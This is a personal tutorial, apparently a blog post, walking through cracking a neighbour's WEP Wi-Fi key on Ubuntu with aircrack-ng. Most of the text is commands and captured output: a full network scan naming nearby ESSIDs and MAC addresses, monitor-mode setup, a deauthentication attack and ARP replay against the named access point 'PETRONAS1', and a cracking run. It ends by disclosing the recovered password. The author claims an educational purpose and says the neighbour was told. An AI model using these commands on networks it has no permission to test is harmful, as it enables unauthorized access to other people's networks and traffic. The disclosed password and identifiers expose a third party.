Hi, this simple tutorial is for cracking wep wifi keys..

My gear :

Lenovo IBM Thinkpad T60 with Intel wireless card embedded. — normal wifi card

Ubuntu 9.04 32bit

My practice target:

Wifi AP on my next home, UTP practical student

Ok lets start:
1.First, because it is not backtrack, i’m gonna have to install aircrack-ng.

sudo apt-get install aircrack-ng

Then, use Kismet or ‘iwlist’ to search or wardrive (in my case i don’t wardrive, juz sitting in my room ) wifi access points

in this example, i’m using iwlist:

2.

sudo iwlist wlan0 scanning

salax@salax-laptop:~$ sudo iwlist wlan0 scanning
wlan0 Scan completed :
Cell 01 – Address: 00:1C:DF:CD:84:74
ESSID:”Soul Society”
Mode:Master
Channel:6
Frequency:2.437 GHz (Channel 6)
Quality=74/100 Signal level:-60 dBm Noise level=-97 dBm
Encryption key:on
IE: Unknown: 000C536F756C20536F6369657479
IE: Unknown: 010882848B962430486C
IE: Unknown: 030106
IE: Unknown: 2A0100
IE: Unknown: 2F0100
IE: IEEE 802.11i/WPA2 Version 1
Group Cipher : TKIP
Pairwise Ciphers (2) : CCMP TKIP
Authentication Suites (1) : PSK
IE: Unknown: 32040C121860
IE: Unknown: DD970050F204104A0001101044000
IE: Unknown: DD090010180200F0000000
IE: WPA Version 1
Group Cipher : TKIP
Pairwise Ciphers (2) : CCMP TKIP
Authentication Suites (1) : PSK
IE: Unknown: DD180050F2020101800003A4000027A4000042435E0062322F00
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s
24 Mb/s; 36 Mb/s; 54 Mb/s; 6 Mb/s; 9 Mb/s
12 Mb/s; 48 Mb/s
Extra:tsf=0000001b713e8183
Extra: Last beacon: 460ms ago
Cell 02 – Address: 00:1E:40:DD:81:60
ESSID:”PETRONAS1″
Mode:Master
Channel:10
Frequency:2.457 GHz (Channel 10)
Quality=51/100 Signal level:-78 dBm Noise level=-97 dBm
Encryption key:on
IE: Unknown: 0009504554524F4E415331
IE: Unknown: 010482848B96
IE: Unknown: 03010A
IE: Unknown: DD060010180205F0
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s
Extra:tsf=00000000b2840fc4
Extra: Last beacon: 328ms ago
Cell 03 – Address: CE:9F:F0:61:B3:05
ESSID:”mariam”
Mode:Ad-Hoc
Channel:10
Frequency:2.457 GHz (Channel 10)
Quality=48/100 Signal level:-80 dBm Noise level=-97 dBm
Encryption key:off
IE: Unknown: 00066D617269616D
IE: Unknown: 010882848B960C183048
IE: Unknown: 03010A
IE: Unknown: 06020000
IE: Unknown: 2A0107
IE: Unknown: 32041224606C
IE: Unknown: DD070050F202000100
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
12 Mb/s; 24 Mb/s; 36 Mb/s; 9 Mb/s; 18 Mb/s
48 Mb/s; 54 Mb/s
Extra:tsf=000000053cd9d3d6
Extra: Last beacon: 280ms ago
Cell 04 – Address: 00:21:91:35:0F:1B
ESSID:”Starbucks”
Mode:Master
Channel:6
Frequency:2.437 GHz (Channel 6)
Quality=45/100 Signal level:-82 dBm Noise level=-97 dBm
Encryption key:on
IE: Unknown: 0009537461726275636B73
IE: Unknown: 010882848B0C12961824
IE: Unknown: 030106
IE: IEEE 802.11i/WPA2 Version 1
Group Cipher : TKIP
Pairwise Ciphers (2) : CCMP TKIP
Authentication Suites (1) : PSK
IE: WPA Version 1
Group Cipher : TKIP
Pairwise Ciphers (2) : CCMP TKIP
Authentication Suites (1) : PSK
IE: Unknown: 2A0100
IE: Unknown: 32043048606C
IE: Unknown: DD0900037F01010060FF7F
IE: Unknown: DD050050F20500
IE: Unknown: DD750050F204104A0001101
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
48 Mb/s; 54 Mb/s
Extra:tsf=000000a10cbf6181
Extra: Last beacon: 472ms ago
Cell 05 – Address: 00:1E:40:66:67:29
ESSID:”Streamyx Mobility”
Mode:Master
Channel:11
Frequency:2.462 GHz (Channel 11)
Quality=45/100 Signal level:-82 dBm Noise level=-97 dBm
Encryption key:on
IE: Unknown: 001153747265616D7978204D6F62696C697479
IE: Unknown: 010882848B962430486C
IE: Unknown: 03010B
IE: Unknown: 2A0104
IE: Unknown: 2F0104
IE: Unknown: 32040C121860
IE: Unknown: DD060010180200F4
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s
24 Mb/s; 36 Mb/s; 54 Mb/s; 6 Mb/s; 9 Mb/s
12 Mb/s; 48 Mb/s
Extra:tsf=00000001118f4184
Extra: Last beacon: 136ms ago

Ok, look at the output, focus on the channel target of the APs. In this example, I’m choosing channel 10 for my practice.

3. Now, execute below command:

sudo airodump-ng -w capture -c 10 wlan0

Now you should see something like this:

If you have error, means that your wifi adapter is busy/ already connected to AP, do below command: If u dont have any problem, just proceed with step 7.

4.

sudo airmon-ng start wlan0

and choose the mode enabled:

5.

Interface Chipset Driver

wlan0 Intel 3945ABG iwl3945 – [phy0]
(monitor mode enabled on mon0)

This actually created another interface which is mon0
6. If you have previous error run with the new command

sudo airodump-ng -w capture -c 10 mon0

If you dont have error, just procede with wlan0.

Leave it running for a while. Focus on the MAC address of your desired AP and the notice the data increasing.

7. Now, open new tab in console and type:

sudo aireplay-ng -e PETRONAS1 -a 00:1E:40:DD:81:60 -c 00:19:D2:00:E6:37 –deauth 10 wlan0

-a 00:1E:40:DD:81:60 : MAC address of targeted AP (PETRONAS1)
-c 00:19:D2:00:E6:37 : MAC address of machine connected to the targeted AP. (This can be seen in the airodump at previous tab).
From this command, you can see the output:

8. Then, open another tab and type:,

sudo aireplay-ng –arpreplay -b 00:1E:40:DD:81:60 -h 00:19:D2:00:E6:37 wlan0

-b 00:1E:40:DD:81:60 : MAC address of targeted AP
-h 00:19:D2:00:E6:37 : MAC address of machine connected to the AP
run the command and we can see it searching for packets. Here you can see the connection of targeted AP and machine connected to it:

9. Lastly, open another tab and type:

sudo aircrack-ng -f 4 -m 00:1E:40:DD:81:60 -n 128 capture.cap

-m 00:1E:40:DD:81:60 : the targeted MAC address
Here, i’m using 128 bit key encryption, assuming you know/guess/search for the targeted WEP key bit encryption. Below are when aircrack are pawning/decode the key:

10. Make it run and leave it until it finds/ the packets captured are enough to decrypt
the key password. The longer/complicated the passphare key, the more time acquire to crack it.. So in my case, i’m waited for about 10 minutes.. Lucky me

Password : petronas12345

p/s: this is for educational purpose, my neighbor has been informed about this and they have change their passphare to new and stronger password key.

Now, to test it, try to connect :

Success!

Here we see how simple and lame passphrase can be manipulated by others. So make it long and complicated, not easy to guess.

If your Internet connection is slow, someone is riding behind you